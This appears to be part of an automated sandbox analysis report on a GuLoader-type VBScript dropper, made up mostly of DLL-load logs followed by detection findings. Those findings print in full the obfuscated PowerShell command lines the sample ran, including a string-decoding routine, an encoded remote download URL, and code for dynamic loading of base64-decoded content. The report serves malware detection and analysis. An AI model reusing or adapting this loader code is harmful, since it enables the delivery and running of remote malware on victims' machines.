              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.2259897499.0000011F98EFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbF`u source: powershell.exe, 00000002.00000002.2307123172.0000011FB1570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdbpdb source: powershell.exe, 00000002.00000002.2259897499.0000011F98EFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000002.00000002.2259897499.0000011F98EFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nagement.Automation.pdb source: powershell.exe, 00000005.00000002.2458725438.00000000008F2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdbysd source: powershell.exe, 00000005.00000002.2485903748.000000000714A000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraen", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000007.00000002.3340834234.0000000007805000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2496426484.000000000BF75000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2495915604.0000000008430000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2479023084.00000000056A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Denter)$GLobAL:pApaLIZation = [sysTEM.teXT.ENCODIng]::aSCIi.GEtStRing($VenSkAbeT)$GloBAl:fLEmer=$PAPaliZatioN.SUBStRINg($faSTGROedE,$uNtRAdITIoNal)<#Arbejdsfortjeneste Arbejdsrutiner
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Olease $Princesse $Ailuro), (Pinte @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:sammentrdets = [AppDomain]::CurrentDomain.GetAssemblies()$global:Brnevol
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fordele)), $Statskalenderen).DefineDynamicModule($Twitterboned, $false).DefineType($Bankieren, $Superexistent149, [System.MulticastDel
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Denter)$GLobAL:pApaLIZation = [sysTEM.teXT.ENCODIng]::aSCIi.GEtStRing($VenSkAbeT)$GloBAl:fLEmer=$PAPaliZatioN.SUBStRINg($faSTGROedE,$uNtRAdITIoNal)<#Arbejdsfortjeneste Arbejdsrutiner
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFree
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFree
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D400BD pushad ; iretd 2_2_00007FF848D400C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_044EC610 pushfd ; ret 5_2_044EC619
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_044E0C49 push eax; ret 5_2_044E0C4A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_044E0C70 push eax; ret 5_2_044E0CAA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_044E0CC0 push eax; ret 5_2_044E0CCA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_044E0CD0 push eax; ret 5_2_044E0CDA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_044E0CB0 push eax; ret 5_2_044E0CBA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08BE0A8D push eax; iretd 5_2_08BE0A94
